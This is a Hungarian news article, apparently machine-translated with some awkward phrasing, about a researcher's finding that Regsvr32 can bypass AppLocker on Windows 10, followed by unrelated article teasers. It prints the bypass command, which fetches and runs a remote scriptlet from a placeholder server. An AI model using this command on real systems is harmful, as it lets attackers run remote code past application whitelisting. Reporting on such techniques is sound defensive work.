A Regsvr32 felhasználható az applocker megkerülésére a Windows 10 rendszeren
Videó: Configuring AppLocker in Windows Server 2019 | Active Directory Group Policy 2024
A Colorado-i kutató, Casey Smith, akinek a neve a neve, rájött, hogy a Regsvr32 felhasználható az AppLocker megkerülésére a Windows 10 rendszeren, és ez nagy problémát jelent a számítógép-felhasználók számára, különösen az üzleti környezetben.
Az AppLocker először a Windows 7 és a Windows Server 2008 R2 rendszerben került bevezetésre. Úgy tervezték, hogy az adminisztrátorok meghatározzák, melyik csoport vagy a felhasználók a fájlok egyedi identitása alapján kihasználhatják néhány vagy az összes alkalmazás előnyeit. Ha Ön olyan személy, aki hajlamos az AppLocker használatára, akkor közismert, hogy felhasználható bizonyos szabályok létrehozására, amelyek lehetővé teszik az alkalmazások számára, hogy futtassák őket, vagy megállítsák őket a műsorszámukban.
Azok számára, akik nem tudják, a Regvr32 felhasználható a DLL-ek regisztrálására és törlésére. Ez nem egy kattintásos eszköz, mivel parancssori segédprogram, tehát csak haladó számítógépes felhasználóknak kell kihasználniuk az általuk kínált lehetőségeket.
Megértjük, hogy e technika alkalmazásával nem változtatja meg a számítógépes rendszer nyilvántartását, ami megnehezíti az adminisztrátorok számára, hogy tudják-e bármilyen változtatást.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
„Itt az a csodálatos, hogy a regsvr32 már ismeri a proxyt, használ TLS-t, követi az átirányításokat, stb.… És… Ön kitalált egy aláírt, alapértelmezett MS bináris fájlt. Tehát mindössze annyit kell tennie, hogy a your.sct fájlt az Ön által ellenőrzött helyen tárolja ”- írta Smith.
A fenti technika nem igényel rendszergazdai jogosultságokat, és nem változtatja meg a beállításjegyzéket. Ezenkívül a szkriptek meghívhatók mind HTTP, mind HTTPS útján. Jelenleg a Microsoft még nem adott ki javítást ehhez a kis problémahoz, tehát az egyetlen lehetőség ezen a ponton a Regsvr32 blokkolása a Windows tűzfalon keresztül.
Érdekes módon a szoftver óriás még nem válaszolt erre az operációs rendszerrel szembesülő biztonsági kérdésre. Most, hogy a szabadban van, arra számítunk, hogy hallani fogunk valamit a társaságtól a jövőbeli javításról szóló beszélgetésekkel együtt.
A hackerek széleket használtak a vmware munkaállomás megkerülésére a pwn2own 2017 során
Az idei Pwn2Own verseny három napos böngészőket és operációs rendszereket követően történt. Végül a Microsoft Edge böngészője vesztesnek bizonyult, miután nem sikerült elhárítania a támadásokat az esemény során. A Qihoo 360 kínai biztonsági cég csapata kihasználta az Edge szolgáltatást, és két biztonsági hibát összekapcsolt, hogy elkerülje a VMware szoftvert.
A 13 legjobb felhasználható 360 ° kültéri kamera
A 13 legjobb 360 fokos kültéri kamera, a jelenlegi és a közelgő, amelyet meg kell vásárolnia egy csodálatos kültéri élményért.
Az online banki szolgáltatásokhoz felhasználható legjobb víruskereső szoftver
Ha gyakran használ internetes banki megoldásokat, itt találja meg azokat a víruskereső eszközöket, amelyeket telepítenie kell a számítógépére a tranzakciók biztosítása érdekében.